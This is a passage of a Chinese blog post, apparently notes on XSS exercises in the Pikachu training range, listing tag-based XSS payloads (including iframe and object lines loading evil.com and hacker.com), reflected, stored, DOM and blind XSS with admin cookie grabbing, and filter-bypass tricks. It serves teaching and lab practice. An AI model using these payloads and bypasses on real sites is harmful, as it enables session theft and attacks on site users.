<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;body&gt;标签：</span><br><span class="line">&lt;body onload&#x3D;alert(&quot;XSS&quot;)&gt;  #使用onload属性在标记内部传递XSS有效内容</span><br><span class="line">&lt;body background&#x3D;&quot;javascript:alert(&quot;XSS&quot;)&quot;&gt; #或其他更加模糊的属性在标记内部传递XSS有效内容</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe&gt;标签：</span><br><span class="line">&lt;iframe src&#x3D;”http:&#x2F;&#x2F;evil.com&#x2F;xss.html”&gt;</span><br><span class="line"></span><br><span class="line">该&lt;iframe&gt;标签允许另一个HTML网页的嵌入到父页面。IFrame可以包含JavaScript，但是，请注意，由于浏览器的内容安全策略（CSP），iFrame中的JavaScript无法访问父页面的DOM。然而，IFrame仍然是非常有效的解除网络钓鱼攻击的手段。</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;input&gt;标签：若标记的type属性&lt;input&gt;设置为image，则可以对其进行操作以嵌入脚本</span><br><span class="line">&lt;input type&#x3D;&quot;image&quot; src&#x3D;&quot;javascript:alert(&#39;XSS&#39;);&quot;&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;link&gt;标签：用来连接外部的样式表可以包含的脚本</span><br><span class="line">&lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;javascript:alert(&#39;XSS&#39;);&quot;&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;table&gt;标签：可利用background属性来引用脚本，而非image</span><br><span class="line">&lt;table background&#x3D;&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span><br><span class="line">&lt;td background&#x3D;&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;div&gt;标签：指定一个背景从而嵌入的脚本，类似table</span><br><span class="line">&lt;div style&#x3D;&quot;background-image: url(javascript:alert(&#39;XSS&#39;))&quot;&gt;</span><br><span class="line">&lt;div style&#x3D;&quot;width: expression(alert(&#39;XSS&#39;));&quot;&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;object&gt;标签：可用于从外部站点脚本包含</span><br><span class="line">&lt;object type&#x3D;&quot;text&#x2F;x-scriptlet&quot; data&#x3D;&quot;http:&#x2F;&#x2F;hacker.com&#x2F;xss.html&quot;&gt;</span><br></pre></td></tr></table></figure>
<h4 id="XSS漏洞的挖掘"><a href="#XSS漏洞的挖掘" class="headerlink" title="XSS漏洞的挖掘"></a>XSS漏洞的挖掘</h4><p>黑盒测试</p>
<p>尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：</p>
<p>URL的每一个参数<br>URL本身<br>表单<br>搜索框<br>常见业务场景</p>
<p>重灾区：评论区、留言区、个人信息、订单信息等<br>针对型：站内信、网页即时通讯、私信、意见反馈<br>存在风险：搜索框、当前目录、图片属性等<br>白盒测试(代码审计)</p>
<p>关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。</p>
<p>PHP中常见的接收参数的方式有$_GET、$_POST、$_REQUEST等等，可以搜索所有接收参数的地方。然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看输出到页面中的数据是否进行了过滤和html编码等处理。</p>
<p>也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取的，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。</p>
<p>大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等。</p>
<p>同理审计DOM型注入可以搜索一些js操作DOM元素的关键词进行审计。</p>
<h4 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h4><p>非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。</p>
<p>前端-》后端-》前端：payload由前端提交到后端执行，再返回前端</p>
<h5 id="反射型xss-get"><a href="#反射型xss-get" class="headerlink" title="反射型xss(get)"></a>反射型xss(get)</h5><p>1.反射型xss</p>
<p>2.表单get型提交，表单中限制长度，由于是get型，可直接在url中修改参数</p>
<p><img src="https://img-blog.csdnimg.cn/20210112101902269.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h5 id="反射型xss-post"><a href="#反射型xss-post" class="headerlink" title="反射型xss(post)"></a>反射型xss(post)</h5><p>1.反射型xss</p>
<p>2.post提交</p>
<p><img src="https://img-blog.csdnimg.cn/20210112102236304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>此处登录框无法执行xss</p>
<p>提示我们先登录</p>
<p><img src="https://img-blog.csdnimg.cn/20210112102502142.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>这里的表单框就可以进行xss攻击了</p>
<p><img src="https://img-blog.csdnimg.cn/20210112102605934.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="输入kobe有个小彩蛋" loading="lazy">输入kobe有个小彩蛋</p>
<h4 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h4><p>持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。</p>
<p>前端-》后端-》数据库-》后端-》前端：payload由前端提交，到后端执行，存储到数据库中；打开网页时又从数据库中得到数据发送到后端执行，再到前端。</p>
<p>直接在留言板中输入payload<script>alert(1)</script></p>
<p><img src="C:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210112103021748.png" alt="image-20210112103021748" loading="lazy"></p>
<p>注入xss后每次访问都会触发，因为xss代码储存到了服务器中</p>
<p><img src="C:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210112103155240.png" alt="image-20210112103155240" loading="lazy"></p>
<h4 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h4><p>不经过后端，基于DOM即Document Object Model（文档对象模型）；也属于反射型xss，通过传入的参数来控制触发</p>
<p>click me！，检查元素，构造闭合</p>
<p><img src="https://img-blog.csdnimg.cn/20210115213323848.png" alt="在这里插入图片描述" loading="lazy"></p>
<p><img src="https://img-blog.csdnimg.cn/20210115213320894.png" alt="在这里插入图片描述" loading="lazy"></p>
<h4 id="DOM型xss-x"><a href="#DOM型xss-x" class="headerlink" title="DOM型xss-x"></a>DOM型xss-x</h4><p>一样的套路，只是参数位置不同</p>
<p><img src="file:///C:\Users\ls\AppData\Roaming\Tencent\Users\1163435945\QQ\WinTemp\RichOle\QQ`S44GWODPWC}}Y4BLQ3PR.png" alt="img" loading="lazy"></p>
<h4 id="XSS盲打"><a href="#XSS盲打" class="headerlink" title="XSS盲打"></a>XSS盲打</h4><p>尽可能地于一切可能的地方提交XSS语句，只要后台管理员看到某一条语句，此语句就能被执行。<br>可在留言板上留下获取cookie的代码，只要管理员在后台看到，就能获取管理员的cookie。</p>
<p>如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="built_in">document</span>.cookie)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210116095520755.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>点击提示可以看到管理员登陆路径</p>
<p><img src="https://img-blog.csdnimg.cn/20210116100050772.png" alt="在这里插入图片描述" loading="lazy"></p>
<p>登陆后就能看到我们输入的语句，因此该语句被执行，cookie被获取</p>
<p><img src="C:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210116100138507.png" alt="image-20210116100138507" loading="lazy"></p>
<h4 id="xss过滤"><a href="#xss过滤" class="headerlink" title="xss过滤"></a>xss过滤</h4><p>bypas为了防止xss攻击而设置的waf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(document.cookie)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p>看看过滤了什么</p>
<p>输入<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code>  =》 ‘&gt;’</p>
<p><img src="https://img-blog.csdnimg.cn/20210116103121112.png" alt="在这里插入图片描述" loading="lazy"></p>
<p><code>alert(document.cookie)</code> =&gt; ‘alert(document.cookie)’</p>
<p><img src="https://img-blog.csdnimg.cn/2021011610340540.png" alt="在这里插入图片描述" loading="lazy"></p>
<p><code>&lt;script&gt;</code>被过滤为<code>&gt;</code>;也就是说<code>&lt;script</code>被过滤</p>
<p>此处只能用 大小写绕过 或者 非script标签的payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCRipt&gt;alert(document.cookie)&lt;&#x2F;sCRipt&gt;</span><br><span class="line">&lt;img  src&#x3D;1  onerror&#x3D;alert(document.cookie)&gt; </span><br></pre></td></tr></table></figure>


<p>看一下源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">过滤部分：</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;submit&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;message&#x27;</span>] != <span class="literal">null</span>)&#123;</span><br><span class="line">    <span class="comment">//这里会使用正则对&lt;script进行替换为空,也就是过滤掉</span></span><br><span class="line">    <span class="variable">$message</span>=preg_replace(<span class="string">&#x27;/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;message&#x27;</span>]);</span><br><span class="line"><span class="comment">//    $message=str_ireplace(&#x27;&lt;script&gt;&#x27;,$_GET[&#x27;message&#x27;]);</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$message</span> == <span class="string">&#x27;yes&#x27;</span>)&#123;</span><br><span class="line">        <span class="variable">$html</span>.=<span class="string">&quot;&lt;p&gt;那就去人民广场一个人坐一会儿吧!&lt;/p&gt;&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$html</span>.=<span class="string">&quot;&lt;p&gt;别说这些&#x27;<span class="subst">&#123;$message&#125;</span>&#x27;的话,不要怕,就是干!&lt;/p&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使用了如下的正则过滤，类似双写、注释干扰都无法生效了</p>
<p><img src="https://img-blog.csdnimg.cn/20210116110202797.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="请添加图片描述" loading="lazy"><br><img src="https://img-blog.csdnimg.cn/20210116110202811.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="请添加图片描述" loading="lazy"></p>
<h5 id="xss过滤常见bypass"><a href="#xss过滤常见bypass" class="headerlink" title="xss过滤常见bypass:"></a>xss过滤常见bypass:</h5><p>大小写绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCRipt&gt;alert(document.cookie)&lt;&#x2F;sCRipt&gt;</span><br></pre></td></tr></table></figure>
<p>双写绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;&#x2F;scr&lt;&#x2F;script&gt;ipt&gt;</span><br></pre></td></tr></table></figure>
<p>编码绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">将payload进行html编码</span><br></pre></td></tr></table></figure>
<p>使用没被过滤的payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">如：&lt;img  src&#x3D;1  onerror&#x3D;alert(document.cookie)&gt; </span><br></pre></td></tr></table></figure>
<p>补一个没见过的注释干扰法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scri&lt;!--test--&gt;pt&gt;alert(test)&lt;&#x2F;scr&lt;!--test--&gt;ipt&gt;</span><br></pre></td></tr></table></figure>


<h4 id="xss之htmlspecialchars"><a href="#xss之htmlspecialchars" class="headerlink" title="xss之htmlspecialchars"></a>xss之htmlspecialchars</h4><p>htmlspecialchars():把预定义的字符转换为 HTML 实体</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">htmlspecialchars(string,flags,character-set,double_encode)</span><br><span class="line">预定义的字符是：</span><br><span class="line">&amp; （和号）成为 &amp;</span><br><span class="line">&quot; （双引号）成为 &quot;</span><br><span class="line">&#39; （单引号）成为 &#39;</span><br><span class="line">&lt; （小于）成为 &lt;</span><br><span class="line">&gt; （大于）成为 &gt;</span><br><span class="line">strings:规定要转换的字符串(必选，其余皆为可选)</span><br><span class="line"></span><br><span class="line">flags:</span><br><span class="line">可用的引号类型:</span><br><span class="line">ENT_COMPAT - 仅编码双引号(默认)。</span><br><span class="line">ENT_QUOTES - 编码双引号和单引号。</span><br><span class="line">ENT_NOQUOTES - 不编码任何引号。</span><br><span class="line"></span><br><span class="line">无效的编码:</span><br><span class="line">ENT_IGNORE - 忽略无效的编码，而不是让函数返回一个空的字符串。应尽量避免，因为这可能对安全性有影响。</span><br><span class="line">ENT_SUBSTITUTE - 把无效的编码替代成一个指定的带有 Unicode 替代字符 U+FFFD（UTF-8）或者 &amp;#FFFD; 的字符，而不是返回一个空的字符串。</span><br><span class="line">ENT_DISALLOWED - 把指定文档类型中的无效代码点替代成 Unicode 替代字符 U+FFFD（UTF-8）或者 &amp;#FFFD;。</span><br><span class="line"></span><br><span class="line">character-set：规定了要使用的字符集的字符串；默认为utf-8</span><br><span class="line"></span><br><span class="line">double_encode：规定了是否编码已存在的 HTML 实体；为bool型(TRUE&#x2F;FALSE)</span><br><span class="line"></span><br><span class="line">ps:$test &#x3D; htmlspecialchars($name, ENT_QUOTES);</span><br></pre></td></tr></table></figure>
<p>此处xss漏洞可能存在的原因是：htmlspecialchars()函数默认对双引号编码，开发者不对单引号进行过滤( flags != ENT_QUOTES )的话就可能导致xss发送</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39; onclick&#x3D;&#39;alert(1)&#39;  #第一个单引号构造闭合；其后两个单引号确保参数不被过滤</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210116111530388.png" alt="请添加图片描述" loading="lazy"></p>
<p><img src="https://img-blog.csdnimg.cn/20210116111530419.png" alt="请添加图片描述" loading="lazy"></p>
<p>这里也可以用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39; onclick&#x3D;&#39;alert(1)</span><br></pre></td></tr></table></figure>
<p>输入’ onclick=’alert(1)，检查如下：</p>
<p><img src="https://img-blog.csdnimg.cn/20210116112422694.png" alt="在这里插入图片描述" loading="lazy"></p>
<p>则可直接’ onclick=’alert(1)即可构造闭合</p>
<p><img src="https://img-blog.csdnimg.cn/20210116112529208.png" alt="在这里插入图片描述" loading="lazy"></p>
<h4 id="xss之href输出"><a href="#xss之href输出" class="headerlink" title="xss之href输出"></a>xss之href输出</h4><p>当输出在a标签里的href属性时，可以用js协议来执行js代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(document.cookie)</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210116113249913.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h4 id="xss之js输出"><a href="#xss之js输出" class="headerlink" title="xss之js输出"></a>xss之js输出</h4><p>先尝试<code>javascript:alert(document.cookie)</code></p>
<p><img src="https://img-blog.csdnimg.cn/20210116113702391.png" alt="请添加图片描述" loading="lazy"></p>
<p>发现我们的输入被插入到了<code>&lt;script&gt;</code>和<code>&lt;/script&gt;</code>之间<img src="https://img-blog.csdnimg.cn/20210116113702424.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="请添加图片描述" loading="lazy"></p>
<p>可以根据此构造闭合：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;script&gt;&lt;script&gt;javascript:alert(document.cookie)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210116114002179.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me money.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/images/zfbpay.jpg"><img loading="lazy" src="/images/zfbpay.jpg" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-alipay-line"></use></svg></span></div></div><div style="display:inline-block"><a href="/images/qqpay.png"><img loading="lazy" src="/images/qqpay.png" alt="QQ 支付" title="QQ 支付"></a><div><span style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></span></div></div><div style="display:inline-block"><a href="/images/wcpay.png"><img loading="lazy" src="/images/wcpay.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Na0h_1e3</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://na0hblog.top/2021/01/16/Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0/" title="Pikachu靶场的小记(未完)">http://na0hblog.top/2021/01/16/Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"></div><div class="post-nav-item"><a class="post-nav-next" href="/2021/01/03/xss-lab%E9%80%9A%E5%85%B3%E5%B0%8F%E8%AE%B0/" rel="next" title="xss-lab通关小记"><span class="post-nav-text">xss-lab通关小记</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div id="comment"><div class="comment-tooltip text-center"><span>在下方留下你的评论吧~</span><br><span>评论前先登陆噢</span><br></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjMyMy8yODgwMQ=="><script>(function(d, s) {
  var j, e = d.getElementsByTagName(s)[0];
  if (typeof LivereTower === 'function') { return; }
  j = d.createElement(s);
  j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
  j.async = true;
  e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> Na0h_1e3</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.3.0</span></div><div class="live_time"><span>自Na0h将神光棒放入此处已经</span><span id="display_live_time"></span><span class="moe-text">٩(͡๏̯͡๏)۶</span><script>function blog_live_time() {
  window.setTimeout(blog_live_time, 1000);
  const start = new Date('2020-12-31T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#00EE76" stroke-width="2" stroke-linecap="round"></circle></svg></a></div><script defer src="/js/utils.js"></script><script defer src="/js/hexo-theme-yun.js"></script><!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/hexo-widget-tree@0.0.5/js/index.js"></script><div id="widget-tree">
      <ul><li class="tree-list-item"><i class="toggle-post-icon gg-folder-add"></i><a class="tree-list-link" href="/categories/web/">web</a><ul class="tree-list-children"><li class="tree-list-item"><i class="toggle-post-icon gg-folder-add"></i><a class="tree-list-link" href="/categories/web/sql%E6%B3%A8%E5%85%A5/">sql注入</a><ul class="tree-list-children"><li class="tree-list-item"><a class="tree-list-post-link" href="/2020/12/30/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E6%93%8D/" title="sql注入的一些基操"><i class="post-icon gg-file-document"></i>sql注入的一些基操</a></li></ul></li><li class="tree-list-item"><i class="toggle-post-icon gg-folder-add"></i><a class="tree-list-link" href="/categories/web/xss/">xss</a><ul class="tree-list-children"><li class="tree-list-item"><a class="tree-list-post-link" href="/2021/01/03/xss-lab%E9%80%9A%E5%85%B3%E5%B0%8F%E8%AE%B0/" title="xss-lab通关小记"><i class="post-icon gg-file-document"></i>xss-lab通关小记</a></li></ul></li></ul></li><li class="tree-list-item"><i class="toggle-post-icon gg-folder-add"></i><a class="tree-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a><ul class="tree-list-children"><li class="tree-list-item"><a class="tree-list-post-link" href="/2021/01/16/Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0/" title="Pikachu靶场的小记(未完)"><i class="post-icon gg-file-document"></i>Pikachu靶场的小记(未完)</a></li></ul></li></ul>
        <div id="widget-tree-button">
          <i class="gg-chevron-right"></i>
        </div>
      </div><!-- hexo injector body_end end --></body></html>